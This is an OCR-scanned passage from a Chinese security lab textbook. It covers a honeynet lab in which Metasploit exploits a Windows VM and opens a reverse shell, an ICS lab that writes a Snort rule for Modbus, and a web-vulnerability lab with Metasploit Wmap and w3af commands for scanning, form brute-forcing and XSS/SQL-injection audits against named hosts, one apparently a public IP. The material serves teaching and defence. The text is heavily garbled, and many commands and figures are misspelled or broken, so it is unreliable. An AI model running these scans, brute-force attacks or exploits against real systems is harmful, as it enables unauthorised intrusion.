Top 10 Honeypots Top 10 Remote Hosts 
Flags Host Connections 10$ events Most Connections 108 events 
192.169.0.4 a o 192.169.0.2 $09 239 
172.21.5.20 12€ 90 
192.166.0.1 155 p 
Top 10 Source Ports Top 10 Destination Ports 
Port Connections 1O$ events Port Connections. 10$ events 
2067 6 6 139 357 198 
2495 5 5 445 205 155 
2517 4 4 161 27 27 
2113 4 4 135 24 2 
3164 3 3 177 1 1 
2202 2 2 1434 1 1 
2363 2 2 3632 1 1 
2956 2 2 162 a a 
2346 2 2 a 19? 9 
2032 2 2 32789 14 LJ 
图 6424 攻击 信息 
m 00:06:35 < NETBIOS SMB-DS IPC$ unicode share access 
192.168.0.7 0 192.168.0.4 P 
meP ?pee (alarm 5079 ke e 
WAT BE She ea < NETBIOS SMB-DS C$ unicode share access 
1750 phon B 
MEJ 26/2006 < ICMP Loretriever Ping 
116004. O — 192.168.0.72 e 
wow ^ ore o(a) 
via 4-81 
E 
port ow 00:00:00 < NETBIOS SMB IPC$ unicode share access 


192.168.0.72 
39 


1 pes *- 
D 


< NETBIOS DCERPC DIRECT msdtc BuildContextW little 
endian heap overfiow attempt 
1- 


 WEB-IIS view source via translate header 


192.168.0.7 © — 192.168.0.4 
P 3923 (oymb- 0 ke 4 pkes - Bo (http) = 
2 Winora FTI 

pes 
Agni eth 00:00:06 4 WEB-IIS mem bin access 


192.168.0.7 — 0 — 192.168.0.4 


CP — 3530 (samp) ovaspkas- 80 (http) k 


wo oa 


图 6435 对 目标 地 址 {9216804 进 行 了 用 户 名 的 破解 


(2) 下 面 以 攻击 主机 IP: 192.168. 92. 14, 蜜 网 虚拟 机 IP: 192. 168. 92. 15 为 例 。 首 先 测试 
攻击 主机 与 蜜 网 虚拟 机 之 间 的 网 络 连 接 ,在 攻击 主机 上 Ping 虚拟 蜜 网 主机 他 ,如 图 6. 4. 26 
所 示 。 

在 虚拟 蜜 网 主机 上 Ping 攻击 主机 IP, 如 图 6. 4. 27 Bras. 

在 蜜 网 网 关上 监听 ICMP Ping 包 是 否 通过 外 网 口 和 内 网 口 , 如 图 6. 4. 28 所 示 。 注 意 ， 
以 下 操作 命令 必须 在 root 权限 下 操作 。 

通过 测试 后 ,说 明 虚 拟 机 蜜 网 和 外 部 网 络 之 间 的 网 络 连 接 没 有 问题 。 输 入 命令 ./ 
msfconsole, 进 入 Metasploit 的 命令 行 .MS05-309 漏洞 攻击 过 程 如 图 6. 4. 29 — [E] 6. 4. 31 
所 示 。 
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图 6426 在 攻击 主机 上 Rng 虚 拟 蜜 网 主机 IP 


ping 192 


inging 192.168.92 
eply fron 192 

eply fron 19 

eply fron 192.1€ 
eply from 192.168.9 


图 649 ”MS05 309 漏 洞 攻击 过 程 1 


es NSFConsole 


TARGET 1 


to be vulnerable 


exploit 


2.14:4321 


dows 2006 (Version 5.00.21951 


1985-2000 Microsoft 


jc: INN 


图 6431 MBS05 309 漏 洞 攻 击 过 程 3 


(3) 对 蜜 网 网 关 记录 的 攻击 数据 进行 分 析 , 如 图 6. 4. 3: 


.32 一 图 6.4. 35 所 示 。 


June 23rd 00:00:39 
14:27:11 
192.168.92.15 0 192.168.92.14 
TCP 1032 (iad3) 0 kB 12 4321 
pkts--» —— (rwhois) 

26 Windows <--0 kB ~ 

16 pkts 
June 23rd 00:00:01 


图 6432 向 外 发 起 的 反 向 Sel 连接 


A 643 RA Shel 连接 对 应 的 详细 进程 视图 


200 。 


ee this precerrs oneaens B 
ne al emor hom tis process oee: B 


Reed Cetele Tone 


3009-11-07 2514609 


99-31-69 11.64 DOD drowns and Bening 


图 6434 键 击 记录 


di ess [C KES Nass 
0 —E 


| 1NWINNTXSystem32» dir c:\ 
| dir s 


CIN eee 


l2013-06-22 14:16 Documents and Settings 
I2013- 16:02 Program Files 
3-06-22 un WINNT 


A645 RA Shal 连接 原始 数据 包 流 重组 结果 


实验 报告 要 求 


写 明 实验 目的 。 

附 上 实验 过 程 的 截图 和 结果 截图 。 
阐述 碰 到 的 问题 以 及 解决 方法 。 
阐述 收获 与 体会 。 
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6.5 工控 入 侵 检测 实验 


预习 要 求 


(1) 做 好 实验 预习 ,复习 工业 信息 安全 的 有 关内 容 。 
(2) 熟悉 modbus 协议 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 目的 


通过 本 实验 ,熟悉 工业 信息 安全 的 基本 原理 ,掌握 工控 入 侵 系 统 检测 方法 并 利用 该 方法 
进行 基本 的 工业 信息 安全 管理 。 


实验 环境 
入 侵 主 机 、 入 侵 检测 系统 。 
预备 知识 


(1) Snort 的 配置 及 使 用 。 
(2) pfsense 的 配置 及 使 用 。 


实验 步 又 


CD 从 官网 下 载 最 新 版 本 的 pfsense 安装 Snort 插件 ,不仅 去 掉 了 烦琐 的 Snort 规则 ,还 
拥有 可 视 化 界面 ,方便 对 其 进行 管理 。 在 官网 (https://www. pfsense. org/) 进行 选择 ,下 
载 最 新 版 本 的 pfsense, 如 图 6.5.1 所 示 。 


€ > C [ee hps/wwwptsenseorg/domnlod uron. gyvo: 


Subscribe To The Netgate Newsletter 


Product information, software announcements, and special offers. 


Architecture: See our newsletter archive for past announcements, 


Installer 


Mirror: 


‘Supported by 


ET netgate 


cutesteasenassotcte 


Daily Snapshots Available 


Daily snapshot builds of our upcoming available for testing and evaluation. Join us on our forum to discuss. 


图 651 下 载 最 新 版 本 的 pisense 
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(2) 在 安装 iso 主机 上 配置 安装 两 块 网 卡 ,一 块 网 卡 作为 wan 口 ,一 块 网 卡 作为 lan A 
进行 Web 管理 和 接收 局 域 网 中 的 流量 ,如 图 6.5.2 所 示 。 


ETE x 
硬件 ”选项 
设备 摘要 内 存 
SORIA ARATE A 4 Mo 
[M 
同 处 理 器 1 
局 硬盘 (scs) 10 GB 此 虚拟 机 的 内 存 (M): 
€) CD/DVD (IDE) 正在 使 用 文件 E:\01download\..… 
网 网 络 适配器 NAT us 
网 网 络 适配器 2 桥接 模式 (自动 ) vend 
Buse 控制 器 存在 n 
De - 8GB a 最 大 建议 内 存 
Bin i (超出 此 大 小 本 能 
Bare 自动 检测 eek 
iG 6.2 GB 
saw 建议 内 存 
T 256 MB 
128 MB 
D 建议 的 最 小 客户 机 操作 系统 内 存 
as 3 32m8 
16M8 
8MB 
4MB 


L wm ]| ms j| wm 
图 652 配置 安装 两 块 网 卡 


(3) 启动 后 直接 安装 iso, 选 择 Accept these Settings 进行 默认 安 


,如 图 6. 5. 3 所 示 。 


Configure Console 


< Change Video Font (default) > 


图 653 默认 安装 iso 
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(4) 使 用 Easy Install 进行 默认 简单 安装 ,如 图 6. 5. 4 和 图 6.5.5 Bron. 


Select Task 


< Quick/Easy Install > 


图 654 默认 安装 isol 


Are you SURE? 


图 655 默认 安装 ise 


(5) 选择 基本 内 核 进行 安装 ,如 图 6.5.6 所 示 。 

(6) 安装 后 直接 访问 相关 端口 ,并 进行 基本 配置 。 

CD 在 系统 插件 管理 中 添加 Snort 插件 ,如 图 6. 5.7 所 示 

(8) 通过 虚拟 工控 环境 进行 复 现 。 在 如 下 模拟 工控 环境 中 ,操作 员 站 正常 连接 PLC 读 
取 PLC 内 容 , 如 图 6.5.8 所 示 。 
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Install Kernel 


< Standard Kernel > 


图 656 基本 内 核 安装 


sense 


System / Package Manager / Package Installer o 


pfSense-pkg-snort installation succes 


Installed Packages ^ Available Packages Package Installer 


ET S S i a AO SS ee 
Package Installation 


图 657 添加 Sot 插件 


入 侵 主机 


图 658 虚拟 工控 环境 
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O) FEA BEES IE FSi — RERE Snort 中 添加 一 个 WAN H ,并 在 流量 进入 的 WAN 


口中 规则 配置 ,如 图 6. 5. 9 所 示 。 


系统 服务 / Snort / 网 络 接口 


Snortinteraces Global Settings 。 更 新 Alerts Blocked Passlists Suppress IPLists — SIDMgmt LogMgmt — Sync 


Interface Settings Overview 
Barnyard2 Status mie 动作 


接口 Snort Status. Pattern Match Blocking 
o wa oco AC-BNFA DISABLED DISABLED WAN [^h 
DISABLED DISABLED LAN oo 


LAN oo AC-SPLIT 


图 659 添加 WANA 

这 里 直接 选择 Snort Interfaces WAN 规则 配置 ,然后 选择 custom. rules 进行 配置 。 
这 里 使 用 的 规则 为 如 果 发 现 不 是 操作 员 站 (192. 168. 254. 131) 的 IP 连接 PLCCI92. 
非法 IP 尝试 连接 modbus, 


168. 254. 130) 的 502 端口 ,就 立即 报警 ,并 提示 消息 
具体 规则 如 下 。 
"de 


alert tcp ! 192. 168. 254. 131 any— 192. 168. 254. 130 502 (msg: 


modbus”; sid; 20000019; rev: 1;classtype:; network-scan; ) . Wn K 6. 5. 10 所 示 。 


系统 服务 / Snort / 规则 策略 / WAN 


Snort interfaces Global Settings 。 更 新 Alerts Blocked Passlists Suppress iPists — SIDMgmt LogMemt — Sync 


WANJRRIRIE WAN Variables WAN Preprocs WAN Bamyard2 — WANIP Rep — WAN 日 志 


WAN 设置 WAN Categories 
Available Rule Categories 
Category Selection: ( custom rules U 


Select the rule category to view and manage 
Defined Custom Rules 
(ose EIR te edu sid: 20000019: rev: 1: classtype: network-sead 


alert top 1192. 168. 264.131 any -> 192.168.254. 130 602 


图 6510 WAN 规 则 配置 


(00 单 击 “ 保 存 ” 按 钮 设置 ,重新 启动 WAN 口 流 量 监测 ,如 图 6.5. 11 所 示 。 


ense 
MUNITY EDITIC 


系统 服务 / Snort / 网 络 接口 e 
Snortinterfeces Global Settings Sk Alerts Blocked Passlists Suppress IPLiss — SIDMgmt — logMgmt — Sync 
sn Snort Status Pattern Match Blocking Barnyard? Status me 动作 
a WAN AC-BNFA DISABLED DISABLED WAN so 
LAN ACSPUT DISABLED DISABLED LAN ao 


fs 


图 6511 重新 启动 WAN 口 流量 监测 


(OD 启动 规则 配置 后 ,查看 alerts 中 是 否 存在 警告 日 志 , 正 常 的 操作 员 站 和 PL 
不 会 发 出 日 志 报警 。 在 人 侵 主机 中 , 读 取 PLC 设备 的 寄存 器 值 。 查 看 相关 的 报警 
警 日 志 中 存在 异常 连接 时 间 、 网 络 连接 类 型 . 源 IP、 源 端口 .目的 IP、 目 的 端口 和 自己 
LAYS SID 描述 信息 ,如 图 6. 5. 12 所 示 。 


ense cd 
UNITY EDITIO 
系统 服务 / Snort / Alerts e 
Snort Interfaces Global Settings 更 新 Alerts Blocked Pass Lists Suppress IP Lists SID Mgmt Log Mgmt Sync 


Alert Log View Settings 
Interface to Inspect | WAN Y| € Auto-retresh view 250 


Choose interface. Alert lines to display. 


^ BUE 
curs 5 


Last 250 Alert Log Entries 


Bm Pri Proto Class Ld SPot — 目的 |P DPort — SD mE 
2018-07-08 3 TCP Detection of aNetwork Scan 192.168.254.1 7515 192.168.254130 502 120000019 。 非法 iP 尝试 连接 modbus 
06:26:12 Q a ex 


2018.07.08 3 TCP Detection of aNetwork Scan = 19216825411 7515 — 192168254130 502 120000019  3EiPeitiefEmodbus 
062612 a a ox 

2018.07.08 3 TCP Detection ofa Network Scan 。 1921682541 7515 102168254120 502 120000010 。 非法 iP 尝试 连接 modbus 
062611 a a ex 

2018-07-08 3 TCP Detection of aNetwork Scan 192.168.254.1 7515 192168254130 502 120000019 。 非法 iP 尝试 连接 modbus 
06:26:11 Q a ox 

2018-07-08 3 TCP  DetectionofaNetworkScan — 1921682541 7515 。 192168254130 502 120000019  4EkiPBEitemodbus. 
0626:10 a a ex 

2018-07-08 3 TCP Detection of aNetwork Scan = 1921682541 7515 192166254130 502 120000019 

06:26:10 Q a ex 

2018-07-08 3 TCP Detection of a Network Scan 192.168.254.1 7515 192168254130 502 1:20000019 

06:26:09 a a ox 


2018.07.08 3 TCP ~ DetectionofaNetwokScan 1921682541 7515 102168254130 502 120000019 
06:26:09 Qa a ex 


图 6512 查看 相关 的 报警 日 志 


C 连接 
& di 


进行 配 


通过 以 上 场景 进行 配置 ,发 现 网 络 中 异常 的 工控 流量 信息 。 判 断 可 疑 链接 是 否 存在 问 
题 , 还 可 直接 在 配置 中 阻止 相关 链接 , 防 患 于 未 然 。 


实验 报告 要 求 
. 写 明 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 


。 阐述 碰 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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第 7 章 Web 漏洞 渗透 实验 


7.1 Web 漏洞 概述 


Web 漏洞 通常 是 指 网 站 程序 上 的 漏洞 。 常 见 的 Web 漏洞 可 以 分 为 以 下 9 种 。 

CO 物理 路 径 泄露 : 物理 路 径 泄露 一 般 是 由 于 Web 服务 器 处 理 用 户 请 求 出 错 导致 的 ， 
如 通过 提交 一 个 超 长 的 请 求 , 或 者 是 某 个 精心 构造 的 特殊 请 求 ,或 者 是 请 求 一 个 Web 服务 
器 上 不 存在 的 文件 。 这 些 请 求 有 一 个 共同 的 特点 , 那 就 是 被 请 求 的 文件 肯定 属于 CGI 脚 
本 ,而 不 是 静态 HTML 页 面 。 还 有 一 种 情况 ,就 是 Web 服务 器 的 某 些 显示 环境 变量 的 程序 
错误 地 输出 了 Web 服务 器 的 物理 路 径 ,当然 这 属于 设计 上 的 问题 。 

(2) CGI 源 代码 泄露 : CGI 源 代码 泄露 的 原因 比较 多 ,例如 大 小 写 、 编 码 解码 .附加 特 
殊 字 符 或 精心 构造 的 特殊 请 求 等 都 可 能 导致 CGI 源 代 码 泄露 。 

(3) 目录 遍历 : 目录 遍历 对 于 Web 服务 器 来 说 并 不 多 见 ,通过 对 任意 目录 附加 “../”， 
或 者 是 在 有 特殊 意义 的 目录 中 附加 *../”, 或 者 是 附加 *../” 的 一 些 变形 ,如 “..\” 或 ..//”， 
甚至 其 编码 ,都 可 能 导致 目录 遍历 。 前 一 种 情况 并 不 多 见 ,但 是 后 面 的 几 种 情况 经 常见 到 ， 
IIS 二 次 解码 漏洞 和 UNICODE 解码 漏洞 都 可 以 看 作 是 变形 后 的 编码 。 

(4) 执行 任意 命令 : 执行 任意 命令 即 执行 任意 操作 系统 命令 ,主要 包括 两 种 情况 。 一 
种 是 通过 遍历 目录 (如 前 面 提 到 的 二 次 解码 和 UNICODE 解码 漏洞 ) 执 行 系统 命令 。 另 外 
一 种 是 Web 服务 器 把 用 户 提交 的 请 求 作为 SSI 指令 解析 ,因此 导致 执行 任意 命令 。 

(5) 缓冲 区 溢出 : 缓冲 区 溢出 漏洞 是 Web 服务 器 没有 对 用 户 提交 的 超 长 请 求 进 行 合适 
的 处 理 , 这 种 请 求 可 能 包括 超 长 URL、 超 长 HTTP Header 域 ,或 者 其 他 超 长 的 数据 。 这 种 
漏洞 可 能 导致 执行 任意 命令 或 者 是 拒绝 服务 ,这 一 般 取决 于 构造 的 数据 。 

(6) 拒绝 服务 : 拒绝 服务 产生 的 原因 多 种 多 样 ,主要 包括 超 长 URL、 特 殊 目 录 、 超 长 
HTTP Header 域 .畸形 HTTP Header 域 或 者 是 DOS 设备 文件 等 。 由 于 Web 服务 器 在 处 
理 这 些 特殊 请 求 时 不 知 所 措 或 者 是 处 理 方式 不 当 , 因 此 出 错 终止 或 挂 起 。 

(7) 条 件 竞争 : 这 里 的 条 件 竞争 主要 针对 一 些 管 理 服务 器 而 言 , 这 类 服务 器 一 般 以 
system 或 root 身份 运行 。 当 它们 需要 使 用 一 些 临 时 文件 ,而 对 这 些 文件 进行 写 操作 之 前 ， 
却 没 有 对 文件 的 属性 进行 检查 ,一 般 可 能 导致 重要 系统 文件 被 重 写 ,甚至 获得 系统 控制 权 。 

(8) 跨 站 脚本 执行 漏洞 : 由 于 网 页 可 以 包含 由 服务 器 生成 的 .并 且 由 客户 机 浏览 器 解 
释 的 文本 和 HTML 标记 。 如 果 不 可 信 的 内 容 被 引入 动态 页 面 中 , 则 无 论 是 网 站 ,还 是 客户 
机 ,都 没有 足够 的 信息 识别 这 种 情况 并 采取 保护 措施 。 攻 击 者 如 果 知 道 某 一 网 站 上 的 应 用 
程序 接收 跨 站 点 脚本 的 提交 ,就 可 以 在 网 页 上 提交 可 以 完成 攻击 的 脚本 ,如 JavaScript、 
VBScript, ActiveX, HTML 或 Flash 等 内 容 , 普 通用 户 一 旦 单 击 了 网 页 上 这 些 攻击 者 提交 
的 脚本 ,就 会 在 用 户 客 户 机 上 执行 ,完成 从 截获 账户 .更 改 用 户 设置 . 窃 取 和 算 改 Cookie 到 
虚假 广告 在 内 的 种 种 攻击 行为 。 

(9) SQL 注入 : 对 于 和 后 台数 据 库 产生 交互 的 网 页 ,如 果 没 有 对 用 户 输入 的 数据 进行 
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合法 性 判断 ,就 会 使 应 用 程序 存在 安全 隐患 。 用 户 可 以 在 提交 正常 数据 的 URL 或 表单 输 
入 框 中 提交 一 段 精心 构造 的 数据 库 查 询 代码 ,使 后 台 应 用 执行 攻击 者 的 SQL 代码 ,攻击 者 
根据 程序 返回 的 结果 ,获得 某 些 想 得 知 的 敏感 数据 ,如 管理 员 密码 .保密 商业 资料 等 。 


7.2 Web 漏洞 实验 


实验 器 材 


Back Track5 的 镜像 文件 ,1 E. 
VMware 虚拟 机 软件 ,1 套 。 
PC(Windows XP/Windows 72.1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 Web 漏洞 技术 的 有 关内 容 。 
(2) 熟悉 实验 过 程 和 基本 操作 流程 。 
(3) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 漏洞 产生 的 原因 ,了 解 常 见 的 漏洞 攻击 。 

实验 环境 

一 台 安 装 了 VMware 虚拟 机 软件 的 Windows 7 操作 系统 的 计算 机 ,BT5(Back Track 
five) 系 统 。 

预备 知识 


(1) 网 络 漏洞 。 
(2) 漏洞 攻击 原理 。 


实验 步 又 


1. 使 用 Metasploit 内 置 的 Wmap Web 扫描 器 

Wmap Web 扫描 模块 允许 使 用 者 使 用 和 配置 Metasploit 中 的 其 他 扫描 辅助 模块 ,对 网 
站 进行 集中 扫描 。 

(1) 首先 ,启动 Metasploit。 

root@ bt:~#msfconsole 

(2) 加 载 wmap 模块 。 

msf> load wrap 

(3) 使 用 help 命令 ,查看 帮助 信息 。 


msf> help 
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Wmap 的 详细 命令 参数 如 下 所 示 。 


wrap vulns Display Web vulns 
wmap Commands 介绍 如 下 。 
wmap_modules: wmap 模块 的 管理 命令 。 
wmap_nodes: 管理 模块 的 节点 命令 。 
wmap run; 对 目标 进行 扫描 的 命令 。 
wmap_sites: 管理 站 点 的 命令 ,将 站 点 添加 到 模块 中 。 
wmap. targets; 管理 目标 的 命令 ,将 添加 的 站 点 作为 扫描 的 目标 。 
wmap_vulns: 展示 网 站 的 vulns。 
(4) 使 用 管理 站 点 命令 ,为 模块 添加 要 扫描 的 站 点 。 


wep sites - a http://202.112.50.74 

设置 后 的 界面 显示 如 下 。 

[* ] Site created. 

设置 的 站 点 IP 地 址 为 http://202. 112. 50.74。 

(5) 使 用 wmap_sites 的 “-1? 命 令 查看 站 点 的 详细 信息 。 
msf> wrap sites -1 

设置 后 的 界面 显示 如 下 。 


[* ] Available sites 


0  202.112.50.74 202.112.50.74 80 http 0 0 


可 以 看 到 刚才 添加 的 站 点 为 第 0 号 站 点 ,站 点 和 虚拟 站 点 均 为 202. 112. 50. 74 ,端口 为 
80 ,使 用 的 协议 为 HTTP。 
(6) 管理 目标 的 命令 将 刚才 添加 的 站 点 设置 为 扫描 的 目标 。 


m wep targets -t http://202.112.50.74 


(7) 使 用 运行 扫描 目标 命令 中 的 “-t” 参 数 查 看 哪些 模块 将 被 用 来 进行 扫描 。 
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m weap mu 一 七 


设置 后 漏洞 扫描 模块 如 下 。 


Testing target: 
Site: 202.112.50.74 (202.112.50.74) 
Port: 80 SSL: false 


Module auxiliary/scanner/http/http version 

Module auxiliary/scanner/http/open proxy 

Module auxiliary/scanner/http/rdbots txt 

Module auxiliary/scanner/http/frontpage login 

Module auxiliary/admin/http/tamcat administration 
Module auxiliary/admin/http/tamcat utf8 traversal 
Module auxiliary/scanner/http/options 

Module auxiliary/scanner/http/drupal views user enum 
Module auxiliary/scanner/http/scraper 

Module auxiliary/scanner/http/svn scanner 

Module auxiliary/scanner/http/trace 

Module auxiliary/scanner/http/vhost scanner 

Module auxiliary/scanner/http/Webdav internal ip 
Module auxiliary/scanner/http/Webdav scanner 

Module auxiliary/scanner/http/Webdav Website content 


Module auxiliary/dos/http/apache range dos 

Module auxiliary/scanner/http/backup file 

Module auxiliary/scanner/http/brute dirs 

Module auxiliary/scanner/http/oopy of file 

Module auxiliary/scanner/http/dir listing 

Module auxiliary/scanner/http/dir scanner 

Module auxiliary/scanner/http/dir Webdav unicode bypass 
Module auxiliary/scanner/http/file same name dir 
Module auxiliary/scanner/http/files dir 

Module auxiliary/scanner/http/http put 


[* ] Module auxiliary/scanner/http/ms09 020 Webdav unicode bypass 
[* ] Module auxiliary/scanner/http/prev dir same name file 

[* ] Module auxiliary/scanner/http/replace ext 

[* ] Module auxiliary/scanner/http/soap xml 

[* ] Module auxiliary/scanner/http/trace axd 

[* ] Module auxiliary/scanner/http/verb auth bypass 


[* ] Module auxiliary/scanner/http/blind sql query 

[* ] Module auxiliary/scanner/http/error sql injection 
[* ] Module auxiliary/scanner/http/http traversal 

[* ] Module auxiliary/scanner/http/rails mass assignment 
[* ] Module exploit/miti/http/lams php exec 


从 返回 结果 可 以 看 出 总 共有 39 个 模块 参与 了 漏洞 的 扫描 。 
(8) 使 用 运行 扫描 目标 命令 中 的 “-e” 参 数 , 对 目标 站 点 进行 扫描 。 


msf> wep rn-e 
设置 后 对 目标 站 点 的 扫描 结果 如 下 。 


[* ] Using ALL wrap enabled modules. 

[- ] NO WAP NODES DEFINED. Executing local modules 
[* ] Testing target: 

[* Site: 202.112.50.74 (202.112.50.74) 

[* Fort: 80 SSL: false 


[* ] Module auxiliary/scanner/http/http version 

[* ] 202.112.50.74:80 Apache/2.2.14 (Ubuntu) mod mono/2.4.3 PHP/5.3.2- lubuntu4.5 with Suhosin- Path mod - 
python/3.3.1 Python/2.6.5 mod per1/2.0.4 Perl/v5.10.1 

[* ] Module auxiliary/scanner/http/open proxy 
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[* ] Module auxiliary/scanner/http/rdbots txt 

[* ] [202.112.50.74] /robots.txt found 

[* ] Module auxiliary/scanner/http/frontpage login 

[* ] Module auxiliary/admin/http/tamcat administration 

[* ] Module auxiliary/admin/http/tamcat utf8 traversal 

[* ] Module auxiliary/scanner/http/options 

[* ] Module auxiliary/scanner/http/drupal views user enum 
[* ] Module auxiliary/scanner/http/scraper 

[* ] Module auxiliary/scanner/http/svn scanner 

[* ] Module auxi liary/scanner/http/trace 


可 以 看 到 auxiliary/scanner/http/http. version 模块 扫描 到 的 服务 器 的 信息 包括 : 


Apache/2.2.14 (Ubuntu) mod mono/2.4.3 FHP/5.3.2- libmnba4.5 with Suhosin- Path md python/3.3.1 Python/2.6.5 

mod per1/2.0.4 Perl/v5.10.1 

auxiliary/scanner/http/robots txt 模块 同样 扫描 到 robots. txt 文件 ( 即 声明 禁止 抓 取 
的 页 面 信息 的 文件 ) 的 存在 。 

Wmap Web 扫描 器 的 模块 众多 ,可 以 根据 具体 情况 去 特定 模块 下 查找 是 否 有 相应 的 信 
息 , 这 里 就 不 一 一 说 明了 。 

2. 使 用 Metasploit 内 置 的 w3af 扫描 器 

w3af(Web Application Attack and Audit Framework) 是 一 个 Web 应 用 程序 攻击 和 审 
计 框 架 。 它 的 目标 是 创建 一 个 易于 使 用 和 扩展 、 能 够 发 现 和 利用 Web 应 用 程序 漏洞 的 主体 
框架 。w3af 的 核心 代码 和 插件 完全 由 Python 编写 。 项 目 已 有 130 多 个 插件 ,这 些 插件 可 
以 检测 SQL 注入 、 跨 站 脚本 、 本 地 和 远程 文件 包含 等 漏洞 。 

目前 w3af 已 经 更 新 至 1.1 版 ,新 版 框架 更 好 、 更 健壮 、 更 快速 。 它 包含 了 新 的 漏洞 检 
测 ,提升 了 约 15% 的 性 能 。 其 功能 和 特点 如 下 。 

。 支持 代理 。 
代理 身份 验证 。 
。 网 站 身份 验证 。 
。 超时 处 理 。 
。 伪造 用 户 代理 。 
。 新 增 自 定义 标题 的 请 求 。 
。 Cookie 处 理 。 
* 本 地 缓存 GET 和 头 部 。 
* 本 地 DNS 缓存 。 
。 保持 和 支持 HTTP 和 HTTPS 连接 。 
使 用 多 POS 请 求 文件 上 传 。 
。 支持 SSL 证 书 。 
(1) 进入 w3af 所 在 文件 夹 。 


root@ bt:~#0d /pentest/Web/w3af/ 


(2) 查看 文件 夹 下 的 文件 。 
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root bt: /pentest/Web/w3af# ls — 1 
设置 后 的 w3af 文件 夹 下 的 文件 详细 信息 如 下 。 


total 52 
drwxr-xr-x 6 root root 4096 2013-05-20 10:23 core 
drwxr-xr-x 12 root root 4096 2013-05-20 10:23 extlib 
drwxr-xr-x 5 root root 4096 2013-05-20 10:23 locales 
drwxr-xr-x 13 root root 4096 2013-05-20 10:23 plugins 
drwxr-xr-x 3 root root 4096 2013-05-20 10:23 profiles 
6 root root 4096 2013-05-20 10:24 reade 
drwxr-xr-x 3 root root 12288 2013-05-20 10:23 scripts 
3 root root 4096 2013-05-20 10:21 tools 
1 root root 5066 2013-05-20 10:24 w3af console 
1 root root 3288 2013-05-20 10:24 w3af gui 


可 以 看 到 ,在 该 文件 夹 下 有 两 个 可 执行 文件 ,分 别 为 W3af_console 和 W3af gui, Ti 
件 名 称 就 可 以 很 清楚 地 明白 这 两 个 执行 文件 的 区 别 , 即 一 个 是 命令 行 执行 方式 , 另 一 个 是 使 
用 图 形 界面 运行 方式 。 本 次 实验 采用 命令 行 窗口 ,图形 界面 的 运行 方式 可 以 自己 进行 实践 。 

(3) 使 用 命令 行 窗口 方式 运行 w3af 模块 。 具 体 输入 如 下 。 

rootf bt: /pentest/Web/w3af# ./w3af console 

(4) 同样 ,使 用 帮助 命令 查看 模块 的 命令 参数 。 


w3af»»»help 


设置 后 的 w3af 模块 的 help 菜单 显示 如 下 。 


| start | Start the scan. | 
| plugins | Enable and configure plugins ! 
| exploit | Exploit the vulnerability. 1 
| profiles | List and use scan profiles | 
| cleanup | Cleanup before starting a new scan. I 
fe E a Se hd ig 
| http- settings | Configure the HTTP settings of the framework. | 
| misc- settings | Configure w3af misc settings. | 
| target | Configure the target URL. 1 
See epee Se a eo ee cC EE EIE ae = 
| back | Go to the previous menu. | 
| exit | Exit w3af | 
| assert | Check assertion. | 
和 dee 
| help | Display help. Issuing: help [cmand], prints more l 
1 | specific help about "command" 1 
| version | Show w3af version information. | 
| keys | Display key shortcuts. 1 
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(5) 进入 模块 配置 阶段 ,根据 前 面 help 菜单 的 显示 ,使 用 plugins 命令 。 


waaf> » » plugins 

(6) 首先 配置 暴力 破解 模块 。 

wBaf/plugins> >>bruteforce 

设置 后 暴力 破解 模块 bruteforce 参数 列表 如 下 。 


| Plugin name | Status | Conf | Description 
I a 
| basichuthBrute | | Yes | Bruteforce HTTP basic authentication. 

| fommuthBrute | | Yes | Bruteforce HIML form authentication. 


(7) 使 用 formAuthBrute 模式 。 


w3af/plugins» > > bruteforce fomüAuthBrute 
w3af/plugins» > > bruteforce config fonmuthBrute 


(8) 为 暴力 破解 模块 添加 用 户 名 和 密码 字典 。 


w3af/plugins/bruteforœ/config: fomðuthBrute> > > set passwdFile True 
w3af/plugins/bruteforce/config: formhuthBrute» > > set usersFile True 


这 样 设置 的 目的 是 , 遇 到 需要 账号 、 密 码 认证 的 页 面 时 ,可 以 调用 设置 的 字典 对 认证 页 
面 进行 暴力 破解 。 当 然 , 暴 力 破解 可 能 使 得 整个 过 程 变 得 很 慢 。 下 面 设 置 审计 模块 的 相关 


参数 。 


(9) 先 从 当前 模块 退出 。 
w3at /plugins/bruteforce/config: formAuthBnute> > > back 
(10) 配置 对 XSS ftl SQL 的 漏洞 扫描 。 


w3af/plugins» > > audit xss,sqli 


这 样 设置 , 即 对 目标 站 点 的 SQL 注入 和 XSS 漏洞 进行 扫描 。 接 下 来 设置 discovery Bt 


块 的 相关 参数 。 


ito 


OD 配置 最 关键 的 WebSpider 插件 。 


w3af/plugins» > > discovery WebSpider 
w3af/plugins» > > discovery config WebSpider 


WebSpider fifi ^F h9 Dy fie Fz ME HI Id 3 P — 4 Stil] URL, 本 次 实验 为 了 节省 时 间 , 通 
nlyForward 参数 . Yt MEH IY E PRE t fe UE Bios F 89 Bp XC. 


(12) 设置 onlyForward 参数 为 真 。 


w3a£/plugins/di scovery/config:WebSpider» > > set onlyForward True 


* 216 * 


d me dme 二- 二“ ae 


(13) 退出 WebSpider 插件 模块 。 

wat /plugins/discovery/config:WebSpider> > » back 
(14) 退出 设置 模块 。 

w3af/plugins» » » back 

(15) 进入 target 模块 进行 设置 。 
wa3af> >> target 

(16) 设置 本 次 要 扫描 的 目标 站 点 。 
Ww3af/oonfig:target> > > set target http://ww.dvssc.om/dvwa/index.php 
(17) 退出 target 设置 模块 。 

w3af /config:tanget> > >back 

(18) 再 次 进入 plugins 设置 模块 。 
waaf>>>plugins 

(19) 设置 扫描 结束 的 输出 文件 类 型 。 


w3af/plugins> >> output htmlFile 
w3af/plugins> > > output config htmlFile 


本 次 实验 中 使 用 的 是 HTML 文件 类 型 ,当然 还 有 很 多 类 型 ,读者 可 以 自己 进 


(20) 设置 verbose 参数 。 
w3af/plugins/output/config:htmlFile> > > set verbose True 

(21) 设置 输出 文件 的 文件 名 。 
w3af/plugins/output/config:htmlFile» > > set fileName tack.html 
(22) 退出 output 设置 模块 。 
w3af/plugins/output/config:htmlFile> > > back 

(23) 退出 plugins 设置 模块 。 

w3af/plugins» >> back 

基本 的 设置 已 经 完成 ,下 面 使 用 start 命令 进行 扫描 。 
(24) 使 用 strat 命令 开始 扫描 。 

w3af> >> start 

设置 后 的 w3af 实际 扫描 后 的 详细 信息 如 下 。 

Auto- enabling plugin: grep.passwordProfiling 

